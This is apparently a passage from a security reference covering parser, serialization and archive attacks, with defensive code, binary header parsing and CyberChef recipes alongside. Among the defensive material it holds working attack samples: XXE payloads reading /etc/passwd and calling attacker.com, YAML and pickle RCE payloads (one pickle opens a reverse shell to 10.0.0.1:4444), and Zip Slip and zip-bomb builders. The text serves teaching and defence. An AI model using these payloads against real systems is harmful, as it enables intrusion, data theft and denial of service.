# Exploitation: WAF parses first key, backend parses last key
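
One defensive answer to the duplicate-key ambiguity is to refuse such documents outright. The sketch below uses the `object_pairs_hook` parameter of `json.loads`, which receives every object's key/value pairs before they are collapsed into a dict; `reject_duplicate_keys` and `strict_loads` are names chosen for this example.

```python
import json


def reject_duplicate_keys(pairs: list[tuple[str, object]]) -> dict:
    """object_pairs_hook that raises instead of letting the last key win."""
    seen: dict = {}
    for key, value in pairs:
        if key in seen:
            raise ValueError(f"duplicate JSON key: {key!r}")
        seen[key] = value
    return seen


def strict_loads(text: str):
    """json.loads that rejects objects with repeated keys at any depth."""
    return json.loads(text, object_pairs_hook=reject_duplicate_keys)
```

Because the hook runs for every object, nested duplicates are caught as well. Rejecting is generally safer than picking a winner, since it removes the parser disagreement that the WAF bypass relies on.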

XML (XXE, XSS, billion laughs)

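# --- DANGEROUS: XML parsers that process DTDs and resolve entities allow XXE ---
# Python's xml.etree.ElementTree does not fetch external entities, but it can still be hit by
# entity-expansion bombs on Expat builds older than 2.4.1; parsers in other stacks may resolve both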

# XXE payload examples:
xxe_file_read = """<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>"""

xxe_ssrf = """<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<root>&xxe;</root>"""

xxe_oob = """<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
  %xxe;
]>
<root>&send;</root>"""

# Billion Laughs (XML bomb) — exponential entity expansion
xml_bomb = """<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<root>&lol9;</root>"""
# 3-byte "lol" x 10^8 (eight tenfold levels) expands to ~300 MB; one more level reaches ~3 GB

# SAFE XML parsing in Python
import defusedxml.ElementTree as ET  # pip install defusedxml
# ET.fromstring(xml_bomb) raises an exception instead of expanding entities
# xml.etree.ElementTree has no simple switch for this, so defusedxml is strongly preferred

YAML (arbitrary code execution)

import yaml

# DANGEROUS: yaml.load() with an unsafe Loader (the default before PyYAML 5.1) executes arbitrary Python
dangerous_yaml = """
!!python/object/apply:os.system
args: ['id']
"""
# yaml.load(dangerous_yaml, Loader=yaml.UnsafeLoader)  # EXECUTES 'id'

# SAFE: Always use SafeLoader
safe = yaml.safe_load("key: value")

# Exploit payloads:
yaml_rce_payloads = [
    "!!python/object/apply:os.system ['whoami']",
    "!!python/object/apply:subprocess.check_output [['id']]",
    "!!python/object/new:os.system ['curl http://attacker.com']",
    "!!python/object/apply:builtins.eval ['__import__(\"os\").system(\"id\")']",
]

# Ruby YAML (Psych) RCE:
# --- !!ruby/object:Gem::Installer
# --- i: x
# --- !!ruby/object:Gem::SpecFetcher
# ---   i: y
# --- !!ruby/object:Gem::Requirement
# ---   requirements:
# ---     !!ruby/object:Gem::Package::TarReader
# ---     io: &1 !!ruby/object:Net::BufferedIO
# ---       io: &1 !!ruby/object:Gem::Package::TarReader::Entry
# ---          read: 0
# ---          header: "abc"
# ---       debug_output: &1 !!ruby/object:Net::WriteAdapter
# ---          socket: &1 !!ruby/object:Gem::RequestSet
# ---              sets: !!ruby/object:Net::WriteAdapter
# ---                  socket: !ruby/module 'Kernel'
# ---                  method_id: :system
# ---              git_set: id
# ---          method_id: :resolve

Python pickle (arbitrary code execution)

import pickle
import os

# NEVER unpickle untrusted data — equivalent to eval()

# RCE via pickle:
class Exploit:
    def __reduce__(self):
        return (os.system, ('id',))

payload = pickle.dumps(Exploit())
print(payload)
# Unpickling this runs 'id'

# More sophisticated: reverse shell via pickle
class ReverseShell:
    def __reduce__(self):
        import subprocess
        return (subprocess.Popen, (
            ['bash', '-c', 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'],
        ))

# Detection: look for these opcodes in pickle data
# \x80 = PROTO
# c = GLOBAL (c__builtin__\neval\n -> dangerous)
# R = REDUCE (calls the callable)
# ( = MARK

def is_pickle_dangerous(data: bytes) -> bool:
    """Heuristic check for dangerous pickle opcodes."""
    dangerous_modules = [b'os', b'subprocess', b'builtins', b'nt',
                         b'posix', b'commands', b'sys', b'importlib']
    for mod in dangerous_modules:
        if mod in data:
            return True
    return False

# Safe alternative: use json, msgpack, or protobuf
# If pickle is required, use hmac to sign before unpickling:
import hmac, hashlib
def safe_pickle_dump(obj, key: bytes) -> tuple[bytes, bytes]:
    data = pickle.dumps(obj)
    sig = hmac.new(key, data, hashlib.sha256).digest()
    return data, sig

def safe_pickle_load(data: bytes, sig: bytes, key: bytes):
    expected = hmac.new(key, data, hashlib.sha256).digest()
    if not hmac.compare_digest(sig, expected):
        raise ValueError("Pickle signature verification failed")
    return pickle.loads(data)
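
Signing proves who produced the pickle but does not limit what it can do. Where the set of expected types is small, the standard library also allows restricting which globals a pickle may reference by overriding `Unpickler.find_class`. The sketch below follows that documented pattern; the allowlist contents and the names `SAFE_BUILTINS` and `restricted_loads` are assumptions for illustration.

```python
import builtins
import io
import pickle

# Assumed allowlist: only these builtins may be referenced by a pickle
SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module: str, name: str):
        # Called for every global the pickle tries to import
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Like pickle.loads, but refuses any global outside the allowlist."""
    return RestrictedUnpickler(io.BytesIO(data)).load()
```

Plain containers, strings, and numbers need no globals and load normally; a `__reduce__` payload that references `os.system` or `builtins.eval` fails at lookup, before anything is called. This narrows the attack surface but is not a sandbox, so untrusted input is still better served by JSON or a similar format.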

PHP serialize/unserialize

# PHP serialization format:
# s:5:"hello";                -> string(5) "hello"
# i:42;                       -> int 42
# b:1;                        -> bool true
# a:2:{s:1:"a";i:1;s:1:"b";i:2;}  -> array("a"=>1, "b"=>2)
# O:4:"User":1:{s:4:"name";s:5:"admin";}  -> User object

# PHP Object Injection: if unserialize() is called on user input,
# attacker can instantiate arbitrary classes and trigger __wakeup(),
# __destruct(), __toString() magic methods

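# Python tool to craft PHP serialized payloads:
def php_serialize_string(s: str) -> str:
    # PHP records the length in bytes, not characters
    return f's:{len(s.encode())}:"{s}";'

def php_serialize_object(class_name: str, properties: dict) -> str:
    props = ''
    for key, value in properties.items():
        props += php_serialize_string(key)
        if isinstance(value, bool):      # check bool first: bool is a subclass of int
            props += f'b:{int(value)};'
        elif isinstance(value, str):
            props += php_serialize_string(value)
        elif isinstance(value, int):
            props += f'i:{value};'
        else:
            # Skipping a value would leave the property count wrong
            raise TypeError(f'unsupported property type: {type(value).__name__}')
    return f'O:{len(class_name.encode())}:"{class_name}":{len(properties)}:{{{props}}}'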

# Forge admin object
payload = php_serialize_object("User", {"role": "admin", "id": 1})
# O:4:"User":2:{s:4:"role";s:5:"admin";s:2:"id";i:1;}

# Type juggling via loose comparison:
# "0e12345" == "0e99999" is TRUE in PHP (both are 0 in scientific notation)
# Exploit: find MD5 hash starting with "0e" followed by only digits
# MD5("240610708") = "0e462097431906509019562988736854" -> equals "0" in loose comparison
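
The "magic hash" condition above is easy to test for offline. The sketch below is a simplified model, not PHP itself: it treats two digests as loosely equal when both have the form 0e followed only by digits, and otherwise falls back to exact comparison. `is_magic_hash` and `php_loose_equal` are illustrative names.

```python
import hashlib
import re

# "0e" followed only by digits: PHP parses this as 0 * 10^N == 0.0
MAGIC = re.compile(r'0+e\d+')


def is_magic_hash(hex_digest: str) -> bool:
    """True if the digest looks like a zero-valued float to PHP's == operator."""
    return MAGIC.fullmatch(hex_digest.lower()) is not None


def php_loose_equal(a: str, b: str) -> bool:
    """Simplified model of == on two hash strings (covers only the 0e case)."""
    if is_magic_hash(a) and is_magic_hash(b):
        return True
    return a == b


digest = hashlib.md5(b"240610708").hexdigest()
print(digest, is_magic_hash(digest))
```

On the PHP side the fix is strict comparison (`===`) or `hash_equals()`, which compare the strings byte for byte.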

13. Compression Security

gzip analysis

import gzip
import struct

# Compress / decompress
data = b"A" * 10000
compressed = gzip.compress(data)
decompressed = gzip.decompress(compressed)

# Parse gzip header (RFC 1952)
def parse_gzip_header(data: bytes) -> dict:
    if data[:2] != b'\x1f\x8b':
        raise ValueError("Not a gzip file")
    method = data[2]        # 8 = deflate
    flags = data[3]
    mtime = struct.unpack('<I', data[4:8])[0]
    return {
        'magic': data[:2].hex(),
        'method': 'deflate' if method == 8 else f'unknown({method})',
        'flags': f'{flags:08b}',
        'ftext': bool(flags & 1),
        'fhcrc': bool(flags & 2),
        'fextra': bool(flags & 4),
        'fname': bool(flags & 8),
        'fcomment': bool(flags & 16),
        'mtime': mtime,
    }

# Analyze gzip file
file suspicious.gz
gzip -l suspicious.gz           # list compression ratio
gzip -d -c suspicious.gz        # decompress to stdout
zcat suspicious.gz              # same as above

# Detect gzip by magic bytes
xxd suspicious.bin | head -1    # look for 1f8b
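
`gzip.decompress()` inflates the whole stream into memory, which is exactly what a decompression bomb exploits. A bounded alternative can be sketched with `zlib.decompressobj`, whose `decompress()` method accepts a `max_length` cap. `bounded_gunzip` and its default limit are assumptions for this example, and the sketch handles a single gzip member only.

```python
import gzip
import zlib


def bounded_gunzip(data: bytes, max_output: int = 10_000_000) -> bytes:
    """Decompress one gzip member, refusing to produce more than max_output bytes."""
    # wbits = 16 + MAX_WBITS tells zlib to expect a gzip header and trailer
    d = zlib.decompressobj(wbits=16 + zlib.MAX_WBITS)
    # Ask for one byte more than allowed so an overrun is detectable
    out = d.decompress(data, max_output + 1)
    if len(out) > max_output:
        raise ValueError(f"decompressed size exceeds {max_output} bytes")
    if not d.eof:
        raise ValueError("truncated or incomplete gzip stream")
    return out
```

Because output is capped before it is allocated, a highly compressible payload costs at most `max_output + 1` bytes of memory.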

ZIP analysis and attacks

import zipfile
import os

# List contents
with zipfile.ZipFile('archive.zip', 'r') as zf:
    for info in zf.infolist():
        print(f"{info.filename:40} {info.file_size:>10} -> {info.compress_size:>10} "
              f"{'encrypted' if info.flag_bits & 0x1 else ''}")

# --- ZIP path traversal (Zip Slip) ---
# Malicious zip contains: ../../etc/cron.d/evil
# When extracted naively, writes outside target directory

def safe_extract(zip_path: str, dest: str) -> None:
    """Extract ZIP safely, preventing path traversal."""
    dest = os.path.realpath(dest)
    with zipfile.ZipFile(zip_path, 'r') as zf:
        for member in zf.infolist():
            member_path = os.path.realpath(os.path.join(dest, member.filename))
            if not member_path.startswith(dest + os.sep) and member_path != dest:
                raise ValueError(f"Path traversal detected: {member.filename}")
            zf.extract(member, dest)

# --- Detect path traversal in ZIP ---
def check_zip_traversal(zip_path: str) -> list[str]:
    dangerous = []
    with zipfile.ZipFile(zip_path, 'r') as zf:
        for name in zf.namelist():
            if name.startswith('/') or '..' in name:
                dangerous.append(name)
    return dangerous

# --- Create Zip Slip payload ---
def create_zip_slip(output: str, target_path: str, content: bytes) -> None:
    """Create a ZIP with path traversal payload. Authorized testing only."""
    with zipfile.ZipFile(output, 'w') as zf:
        zf.writestr(target_path, content)

# create_zip_slip('evil.zip', '../../../../tmp/evil.sh', b'#!/bin/bash\nid > /tmp/pwned\n')

ZIP bomb (decompression bomb)

# --- Nested ZIP bomb ---
# 42.zip: 42KB compressed -> 4.5 PB decompressed (nested ZIPs)
# The check below inspects one layer only; nested archives need it applied recursively

def detect_zip_bomb(zip_path: str, ratio_threshold: int = 100,
                     size_threshold: int = 1_000_000_000) -> bool:
    """Detect potential ZIP bomb by compression ratio."""
    with zipfile.ZipFile(zip_path, 'r') as zf:
        for info in zf.infolist():
            if info.compress_size > 0:
                ratio = info.file_size / info.compress_size
                if ratio > ratio_threshold or info.file_size > size_threshold:
                    return True
            elif info.file_size > 0:
                return True  # zero compressed size but non-zero file size
    return False

# Create a simple zip bomb (for testing decompression limits)
def create_zip_bomb(output: str, uncompressed_size: int = 10_000_000) -> None:
    """Create a single-layer zip bomb. Testing only."""
    with zipfile.ZipFile(output, 'w', zipfile.ZIP_DEFLATED) as zf:
        # Highly compressible data
        zf.writestr('bomb.txt', b'\x00' * uncompressed_size)

tar analysis and attacks

# List tar contents and flag path traversal (-t without -v, so each line starts with the member path)
tar -tf archive.tar | grep -E '(^|/)\.\.(/|$)|^/'

# Safe extraction (GNU tar strips leading / by default)
tar --no-same-owner --no-same-permissions -xvf archive.tar -C /tmp/safe/

# Check for symlink attacks
tar -tvf archive.tar | grep '^l'

import tarfile

# Detect dangerous tar entries
def check_tar_safety(tar_path: str) -> list[str]:
    issues = []
    with tarfile.open(tar_path) as tf:
        for member in tf.getmembers():
            # Path traversal
            if member.name.startswith('/') or '..' in member.name:
                issues.append(f"PATH_TRAVERSAL: {member.name}")
            # Symlink outside extraction directory
            if member.issym() or member.islnk():
                issues.append(f"SYMLINK: {member.name} -> {member.linkname}")
            # Setuid/setgid bits
            if member.mode & 0o4000 or member.mode & 0o2000:
                issues.append(f"SETUID/SETGID: {member.name} mode={oct(member.mode)}")
            # Device files
            if member.isdev():
                issues.append(f"DEVICE_FILE: {member.name}")
    return issues

# Safe extraction: extraction filters (Python 3.12+, also backported to later 3.8-3.11 security releases)
# with tarfile.open(path) as tf:
#     tf.extractall(dest, filter='data')
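
On interpreters without extraction filters, the path check can be done by hand before extracting. The sketch below resolves each member name against the destination, in the same spirit as the ZIP `safe_extract` above; `members_escaping` and `build_demo_tar` are names invented for this example, and the member names are placeholders. It covers path traversal through names only, not symlink members that point outside the destination.

```python
import io
import os
import tarfile


def members_escaping(tf: tarfile.TarFile, dest: str) -> list[str]:
    """Return member names whose resolved path would land outside dest."""
    root = os.path.realpath(dest)
    escaping = []
    for member in tf.getmembers():
        target = os.path.realpath(os.path.join(root, member.name))
        if os.path.commonpath([root, target]) != root:
            escaping.append(member.name)
    return escaping


def build_demo_tar(names: list[str]) -> bytes:
    """Build an in-memory tar of empty files, for exercising the check."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        for name in names:
            tf.addfile(tarfile.TarInfo(name))
    return buf.getvalue()
```

Refusing the whole archive when the returned list is non-empty is usually simpler to reason about than skipping individual members.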

14. Binary & Struct Manipulation

struct packing and unpacking

import struct

# Format characters:
# < little-endian    > big-endian    ! network (big-endian)    = native
# b/B signed/unsigned byte (1)
# h/H signed/unsigned short (2)
# i/I signed/unsigned int (4)
# l/L signed/unsigned long (4)
# q/Q signed/unsigned long long (8)
# f   float (4)       d   double (8)
# s   char[] (bytes)  p   pascal string
# x   padding byte

# Pack values into binary
packed = struct.pack('<IHH', 0xdeadbeef, 0x1234, 0x5678)
print(packed.hex())   # efbeadde34127856 (little-endian)

# Unpack binary to values
values = struct.unpack('<IHH', packed)
print([hex(v) for v in values])  # ['0xdeadbeef', '0x1234', '0x5678']

# Network byte order (big-endian) for IP/TCP
import socket
ip_packed = socket.inet_aton("192.168.1.1")   # b'\xc0\xa8\x01\x01'
ip_int = struct.unpack('!I', ip_packed)[0]     # 3232235777
ip_str = socket.inet_ntoa(struct.pack('!I', ip_int))  # '192.168.1.1'

# Pack a C struct
# struct header { uint32_t magic; uint16_t version; uint16_t flags; uint32_t size; };
header = struct.pack('<IHHI', 0x7f454c46, 2, 1, 0x1000)

# Unpack with named fields (using namedtuple)
from collections import namedtuple
Header = namedtuple('Header', 'magic version flags size')
parsed = Header._make(struct.unpack('<IHHI', header))
print(f"Magic: {parsed.magic:#x}, Version: {parsed.version}")
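
Binary formats often store many fixed-size records back to back. A precompiled `struct.Struct` with `iter_unpack` handles that case directly; the sketch below assumes a hypothetical 8-byte record layout (`uint32 id, uint16 kind, uint16 flags`) purely for illustration.

```python
import struct

# Hypothetical record: uint32 id, uint16 kind, uint16 flags (little-endian, no padding)
RECORD = struct.Struct('<IHH')


def parse_records(blob: bytes) -> list[tuple[int, int, int]]:
    """Split blob into consecutive RECORD-sized entries."""
    if len(blob) % RECORD.size:
        raise ValueError(
            f"length {len(blob)} is not a multiple of record size {RECORD.size}")
    return list(RECORD.iter_unpack(blob))


blob = RECORD.pack(1, 2, 3) + RECORD.pack(4, 5, 6)
print(parse_records(blob))        # [(1, 2, 3), (4, 5, 6)]
print(struct.calcsize('<BI'))     # 5: an explicit byte order disables alignment padding
```

With the native `@` prefix (the default when no prefix is given), `struct` inserts C-style alignment padding, so sizes can differ from the explicit `<` or `>` layouts and vary by platform.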

Endianness

# Little-endian: least significant byte first (x86, ARM default)
# Big-endian: most significant byte first (network order, MIPS, SPARC)

value = 0xdeadbeef

# Manual conversion
le_bytes = value.to_bytes(4, 'little')   # b'\xef\xbe\xad\xde'
be_bytes = value.to_bytes(4, 'big')      # b'\xde\xad\xbe\xef'

# Swap endianness
def swap_endian_32(val: int) -> int:
    return struct.unpack('<I', struct.pack('>I', val))[0]

def swap_endian_16(val: int) -> int:
    return struct.unpack('<H', struct.pack('>H', val))[0]

# Detect endianness of a binary
def detect_endianness(data: bytes, offset: int, expected: int) -> str:
    """Check if value at offset matches expected in LE or BE."""
    le_val = struct.unpack_from('<I', data, offset)[0]
    be_val = struct.unpack_from('>I', data, offset)[0]
    if le_val == expected:
        return 'little-endian'
    elif be_val == expected:
        return 'big-endian'
    return 'unknown'

# Python int methods
val = int.from_bytes(b'\xef\xbe\xad\xde', 'little')   # 0xdeadbeef
val = int.from_bytes(b'\xde\xad\xbe\xef', 'big')       # 0xdeadbeef

ELF header parsing

import struct
from collections import namedtuple

def parse_elf_header(data: bytes) -> dict:
    """Parse ELF file header."""
    if data[:4] != b'\x7fELF':
        raise ValueError("Not an ELF file")

    ei_class = data[4]      # 1=32-bit, 2=64-bit
    ei_data = data[5]       # 1=LE, 2=BE
    ei_version = data[6]    # 1=current
    ei_osabi = data[7]      # 0=SYSV, 3=Linux, etc.

    endian = '<' if ei_data == 1 else '>'
    bits = 32 if ei_class == 1 else 64

    if bits == 64:
        # e_type(2) e_machine(2) e_version(4) e_entry(8) e_phoff(8) e_shoff(8)
        # e_flags(4) e_ehsize(2) e_phentsize(2) e_phnum(2) e_shentsize(2)
        # e_shnum(2) e_shstrndx(2)
        fmt = f'{endian}HHIQQQIHHHHHH'
        fields = struct.unpack_from(fmt, data, 16)
        e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, \
        e_flags, e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx = fields
    else:
        fmt = f'{endian}HHIIIIIHHHHHH'
        fields = struct.unpack_from(fmt, data, 16)
        e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, \
        e_flags, e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx = fields

    ELF_TYPES = {0: 'ET_NONE', 1: 'ET_REL', 2: 'ET_EXEC', 3: 'ET_DYN', 4: 'ET_CORE'}
    MACHINES = {0x3: 'x86', 0x3E: 'x86_64', 0x28: 'ARM', 0xB7: 'AArch64',
                0x08: 'MIPS', 0xF3: 'RISC-V'}

    return {
        'class': f'{bits}-bit',
        'endian': 'little' if ei_data == 1 else 'big',
        'type': ELF_TYPES.get(e_type, f'0x{e_type:x}'),
        'machine': MACHINES.get(e_machine, f'0x{e_machine:x}'),
        'entry_point': f'0x{e_entry:x}',
        'ph_offset': e_phoff,
        'ph_count': e_phnum,
        'sh_offset': e_shoff,
        'sh_count': e_shnum,
    }

# Usage:
# with open('/bin/ls', 'rb') as f:
#     info = parse_elf_header(f.read(64))
#     for k, v in info.items():
#         print(f"{k}: {v}")

# Quick ELF analysis
readelf -h /bin/ls            # full header
readelf -l /bin/ls            # program headers (segments)
readelf -S /bin/ls            # section headers
readelf -d /bin/ls            # dynamic section (libraries)
readelf -s /bin/ls            # symbol table
objdump -d /bin/ls | head -50 # disassembly

# Check for security features
checksec --file=/bin/ls       # RELRO, Stack Canary, NX, PIE, RPATH, RUNPATH

PE header parsing

import struct

def parse_pe_header(data: bytes) -> dict:
    """Parse PE (Windows executable) header."""
    if data[:2] != b'MZ':
        raise ValueError("Not a PE file")

    # e_lfanew: offset to PE signature (at offset 0x3C)
    pe_offset = struct.unpack_from('<I', data, 0x3C)[0]

    if data[pe_offset:pe_offset+4] != b'PE\x00\x00':
        raise ValueError("Invalid PE signature")

    # COFF header (20 bytes after PE signature)
    coff_offset = pe_offset + 4
    machine, num_sections, timestamp, sym_table, num_symbols, \
    opt_header_size, characteristics = struct.unpack_from('<HHIIIHH', data, coff_offset)

    MACHINES = {0x14c: 'x86', 0x8664: 'x86_64', 0xAA64: 'ARM64'}

    # Optional header magic
    opt_offset = coff_offset + 20
    opt_magic = struct.unpack_from('<H', data, opt_offset)[0]
    pe_type = 'PE32+' if opt_magic == 0x20b else 'PE32'

    # Entry point and image base
    if pe_type == 'PE32+':
        entry_rva = struct.unpack_from('<I', data, opt_offset + 16)[0]
        image_base = struct.unpack_from('<Q', data, opt_offset + 24)[0]
    else:
        entry_rva = struct.unpack_from('<I', data, opt_offset + 16)[0]
        image_base = struct.unpack_from('<I', data, opt_offset + 28)[0]

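    import datetime
    try:
        # utcfromtimestamp() is deprecated since Python 3.12; build an aware UTC datetime instead
        compile_time = datetime.datetime.fromtimestamp(
            timestamp, datetime.timezone.utc).isoformat()
    except (OSError, OverflowError, ValueError):
        compile_time = f"raw: {timestamp}"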

    return {
        'type': pe_type,
        'machine': MACHINES.get(machine, f'0x{machine:x}'),
        'sections': num_sections,
        'compile_time': compile_time,
        'entry_point_rva': f'0x{entry_rva:x}',
        'image_base': f'0x{image_base:x}',
        'characteristics': f'0x{characteristics:x}',
        'is_dll': bool(characteristics & 0x2000),
        'is_exe': bool(characteristics & 0x0002),
    }

# Usage:
# with open('malware.exe', 'rb') as f:
#     info = parse_pe_header(f.read(1024))

Shellcode extraction and analysis

# Extract shellcode from various formats

def shellcode_from_c_array(c_code: str) -> bytes:
    """Parse C-style shellcode: unsigned char buf[] = {0x6a,...};"""
    import re
    hex_vals = re.findall(r'0x([0-9a-fA-F]{1,2})', c_code)
    return bytes(int(h, 16) for h in hex_vals)

def shellcode_from_escaped(escaped: str) -> bytes:
    """Parse \\x escape format: \\x6a\\x02\\x58"""
    import re
    hex_vals = re.findall(r'\\x([0-9a-fA-F]{2})', escaped)
    return bytes(int(h, 16) for h in hex_vals)

def shellcode_to_c_array(data: bytes, var_name: str = "buf") -> str:
    """Convert bytes to C array format."""
    hex_vals = ', '.join(f'0x{b:02x}' for b in data)
    return f'unsigned char {var_name}[] = {{{hex_vals}}};'

def shellcode_to_python(data: bytes) -> str:
    """Convert bytes to Python bytes literal."""
    return 'shellcode = b"' + ''.join(f'\\x{b:02x}' for b in data) + '"'

# Null byte detection (important for buffer overflow exploits)
def check_bad_chars(shellcode: bytes, bad_chars: bytes = b'\x00') -> list[int]:
    """Find positions of bad characters in shellcode."""
    positions = []
    for i, b in enumerate(shellcode):
        if b in bad_chars:
            positions.append(i)
    return positions

# Common bad characters for testing
ALL_BAD_CHARS = bytes(range(256))  # Generate all bytes, test which get mangled

# Extract shellcode from binary at specific offset
dd if=payload.bin bs=1 skip=1024 count=256 2>/dev/null | xxd -p | tr -d '\n'

# Disassemble shellcode
echo -ne '\x6a\x02\x58\x99\x48\x89\xd7\x48\x31\xf6\x0f\x05' | ndisasm -b 64 -

# Test shellcode (DANGEROUS — sandbox only)
# gcc -z execstack -o test test.c && ./test

15. CyberChef Reference

CyberChef is a browser-based data manipulation tool — "The Cyber Swiss Army Knife." All operations run client-side; no data leaves the browser. Source: github.com/gchq/CyberChef (34k+ stars).

Key features

Feature	Description
Drag-and-drop recipes	Chain operations visually
Auto Bake	Real-time output as input/recipe changes
Magic	Auto-detect encoding and suggest decode steps
Breakpoints	Step through recipe stages to inspect intermediate data
File support	Handle files up to ~2 GB
URL sharing	Share complete recipes via URL parameters
Client-side	No data sent to any server

Most-used operations for security work

Category	Operations
Encoding	To/From Base64, Base32, Base58, Base85, Hex, Decimal, Binary, Octal, Braille, Morse
URL/HTML	URL Encode/Decode, HTML Entity Encode/Decode
Crypto	AES/DES/3DES/Blowfish/RC4 Encrypt/Decrypt, XOR, ROT13, ROT47, Vigenere
Hashing	MD5, SHA-1, SHA-256, SHA-512, SHA-3, HMAC, bcrypt, scrypt, NTLM
Compression	Gunzip, Gzip, Zip, Bzip2, Raw Inflate/Deflate, Zlib
Data format	Parse JSON, XML, CSV, protobuf, MessagePack, BSON
Networking	Parse IP, Parse URI, DNS over HTTPS, HTTP request, Defang URL/IP
Analysis	Entropy, Frequency distribution, Detect file type, Strings, Hexdump
Code	JavaScript/PHP/XML Beautify/Minify, Disassemble x86, Parse ASN.1
Visual	Render Image, Play Media, Render Markdown
Forensics	Extract files (binwalk-style), Parse TLS, Parse X.509, Windows Filetime
Flow	Fork, Merge, Register, Conditional Jump, Label, Comment

Useful CyberChef recipes (bookmark these)

Decode multi-layer obfuscation:

From_Base64 -> Gunzip -> From_Hex -> XOR({'key':'secret'})
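The same chain can be reproduced offline with the standard library. This is a minimal sketch, assuming the hex layer is ASCII text and the XOR key repeats; the function name peel_layers is hypothetical, and the sample is built in the script itself rather than taken from real malware.

```python
import base64
import gzip
from itertools import cycle

def peel_layers(blob: str, key: bytes) -> bytes:
    """Undo Base64 -> gzip -> hex -> repeating-key XOR, in that order."""
    stage1 = base64.b64decode(blob)              # From_Base64
    stage2 = gzip.decompress(stage1)             # Gunzip
    stage3 = bytes.fromhex(stage2.decode())      # From_Hex
    return bytes(b ^ k for b, k in zip(stage3, cycle(key)))   # XOR

# Build a sample by applying the layers in reverse, then peel them off.
key = b"secret"
plain = b"attack at dawn"
xored = bytes(b ^ k for b, k in zip(plain, cycle(key)))
sample = base64.b64encode(gzip.compress(xored.hex().encode())).decode()
print(peel_layers(sample, key))   # b'attack at dawn'
```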

Extract IOCs from text:

Extract_IP_addresses -> Defang_IP_Addresses

Decode PowerShell -EncodedCommand:

From_Base64 -> Decode_text('UTF-16LE')

Analyze suspicious file:

Detect_File_Type -> Entropy -> Strings
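For batch triage outside the browser, the entropy and strings steps are easy to approximate in Python. The sketch below is an approximation of those two operations, not CyberChef's implementation; the function names are hypothetical.

```python
import math
import re
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant data, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    total = len(data)
    return -sum((n / total) * math.log2(n / total) for n in Counter(data).values())

def ascii_strings(data: bytes, min_len: int = 4) -> list[bytes]:
    """Runs of printable ASCII at least `min_len` bytes long, similar to strings(1)."""
    return re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)

blob = b"\x00\x01hello\x00ab\x00world!\xff"
print(ascii_strings(blob))                    # [b'hello', b'world!']
print(shannon_entropy(bytes(range(256))))     # 8.0
```

Values close to 8 bits per byte usually indicate compressed or encrypted content; plain text and most uncompressed code score noticeably lower.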

JWT decode:

JWT_Decode

Timestamp conversion:

From_UNIX_Timestamp -> To_ISO_8601
Windows_Filetime_to_UNIX -> From_UNIX_Timestamp
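The arithmetic behind these conversions is short enough to script. A minimal sketch, assuming the FILETIME value is already an integer count of 100 ns ticks since 1601-01-01 UTC; the function names are hypothetical.

```python
from datetime import datetime, timezone

TICKS_PER_SECOND = 10_000_000          # FILETIME counts 100 ns intervals
EPOCH_DIFF_SECONDS = 11_644_473_600    # seconds between 1601-01-01 and 1970-01-01

def filetime_to_unix(filetime: int) -> float:
    """Convert a Windows FILETIME tick count to Unix seconds."""
    return (filetime - EPOCH_DIFF_SECONDS * TICKS_PER_SECOND) / TICKS_PER_SECOND

def unix_to_iso8601(ts: float) -> str:
    """Render Unix seconds as an ISO 8601 timestamp in UTC."""
    return datetime.fromtimestamp(ts, tz=timezone.utc).isoformat()

print(unix_to_iso8601(1516239022))                              # 2018-01-18T01:30:22+00:00
print(unix_to_iso8601(filetime_to_unix(116444736000000000)))    # 1970-01-01T00:00:00+00:00
```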

Defang indicators for safe sharing:

Defang_URL -> Defang_IP_Addresses
# Converts http://evil.com -> hxxp[://]evil[.]com
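When indicators are handled in scripts rather than in the browser, the same defanging convention is simple to apply. The sketch below follows the hxxp / [://] / [.] style shown above; it is not CyberChef's code, and the function names are hypothetical.

```python
import re

def defang(indicator: str) -> str:
    """Defang a URL, domain, or IPv4 address for safe sharing."""
    out = re.sub(r"^http", "hxxp", indicator, flags=re.IGNORECASE)
    out = out.replace("://", "[://]")
    return out.replace(".", "[.]")

def refang(indicator: str) -> str:
    """Reverse defang() so the indicator can be fed back into tooling."""
    out = indicator.replace("[.]", ".").replace("[://]", "://")
    return re.sub(r"^hxxp", "http", out, flags=re.IGNORECASE)

print(defang("http://evil.com"))          # hxxp[://]evil[.]com
print(defang("10.0.0.1"))                 # 10[.]0[.]0[.]1
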